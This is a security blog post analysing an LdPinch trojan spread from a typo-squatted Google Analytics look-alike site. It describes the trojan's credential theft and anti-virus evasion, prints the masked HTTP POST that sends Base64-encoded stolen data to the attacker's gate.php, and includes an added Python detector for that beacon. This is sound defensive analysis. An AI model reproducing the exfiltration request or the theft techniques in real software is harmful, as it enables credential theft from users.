Old Tricks, Old malware, Quick blog
04.16.2008 - 4:31 PM
Recently, we have had reports of malicious sites using a "Google analytics" domain name, with minor twists (typos) to get traffic and eventually infect machines.
With old tricks come old malware
The fake Google analytics Web site was hosting a variant of the infamous LdPinch Trojan. Although this threat is well known, the anti-virus coverage was really low. Only the generic packer detection triggered on a few of them. The reason behind this problem is the obfuscation used to protect the malicious code from prying eyes. Under the obfuscation, a very standard sample is used, with features common to most of the LdPinch variants.
The trojan uses threads to look for anti-virus software. It tries to detect any window that could be displayed by the anti-virus software, and close it as soon as it appears on the screen:

It also registers itself to the Windows XP firewall by changing the registry:

The spyware then starts to gather information on the computer on which it is running, including Windows information such as DisplayName, DigitalProductID, etc.
The malicious code browses the uninstall information to see what software is installed. It gathers information about the system's current usage of both physical and virtual memory using the GlobalMemoryStatus API function. The malicious code gets the Windows version, the current user and computer names, and starts listing all the logical drives on the computer. For the fixed hard drives, it also logs the amount of free space available.
It then starts logging information related to the hardware, such as CPU information, using the cpuid instruction (once with EAX=0 to get the Vendor ID, and once with EAX=1 to get the Processor Info and Feature Bits).
The malicious code gets the current host name and language used on the computer, lists all the running processes, Windows and system paths, current directory, temp, startup information, and application data paths. All directories in this folder are logged, in order to learn information about the users on the machine.
The malicious code looks for TheBat, ICQ (99 to 2002, including minor versions), Miranda, Trillian and dial-up connection passwords and logs them. It reads the protected storage and logs the information it finds. TotalCommander, CuteFTP (many versions), FAR manager FTP and WS FTP sites and passwords are also stolen.
The browsers are not excluded: Opera and Mozilla profiles are browsed for sensitive information, along with email clients (Eudora, Outlook), FTP clients (FlashFXP, FileZilla), download managers (looking for rapidshare and megaupload premium account information), Passport .NET credentials and much more.
The list of targets is so long that it is not listed here.
Eventually, everything gets encrypted and Base64 encoded, and posted (once the Internet connection is active on the computer) onto the fake Google analytics site, using a PHP file that logs the data server side:
POST on /gate.php:

    POST /gate.php HTTP/1.0
    Host: google-*****.com
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 1624

    a=chee****@mail.ru&b=report&d=report.bin&c=*/BASE64stolendata/*
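As a defender-side illustration added here (not code from the original post or from any Websense tooling), the following Python checks a captured HTTP request for the traits of this beacon: the gate.php path, a Google look-alike Host header, the b=report/d=report.bin form fields and a Base64 blob in c. The host name, account and report contents are constructed placeholders standing in for the masked values shown above.

```python
"""Flag an LdPinch-style "gate.php" exfiltration POST in captured HTTP."""
import base64
import binascii
from urllib.parse import parse_qs, urlencode

# Legitimate analytics hosts; anything else starting with "google" is suspect.
LEGIT_HOSTS = {"google-analytics.com", "www.google-analytics.com",
               "ssl.google-analytics.com"}


def build_sample_request() -> str:
    """Constructed request modelled on the masked POST from the post."""
    report = b"constructed: fake host info, fake credentials"
    body = urlencode({"a": "dropbox@example.invalid", "b": "report",
                      "d": "report.bin",
                      "c": base64.b64encode(report).decode()})
    return ("POST /gate.php HTTP/1.0\r\n"
            "Host: google-placeholder.example\r\n"  # stands in for google-*****.com
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {len(body)}\r\n\r\n{body}")


def parse_request(raw: str) -> tuple[str, str, dict, str]:
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def looks_like_b64(value: str) -> bool:
    try:
        base64.b64decode(value, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def ldpinch_indicators(raw: str) -> list[str]:
    """Return the matched indicators; an empty list means nothing matched."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or headers.get("content-type") != "application/x-www-form-urlencoded":
        return []
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    hits = []
    if path.endswith("/gate.php"):
        hits.append("path /gate.php")
    host = headers.get("host", "").lower()
    if host.startswith("google") and host not in LEGIT_HOSTS:
        hits.append(f"google look-alike host {host}")
    if fields.get("b") == "report" and fields.get("d") == "report.bin":
        hits.append("b=report&d=report.bin form fields")
    if "c" in fields and len(fields["c"]) > 16 and looks_like_b64(fields["c"]):
        hits.append("base64 blob in field c")
    return hits
```

Any single indicator is weak on its own; alerting on the gate.php path together with the fixed form fields keeps false positives on ordinary analytics traffic low.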
Classic tricks combined with old malware are still very effective.
Security Researcher: Nicolas Brulez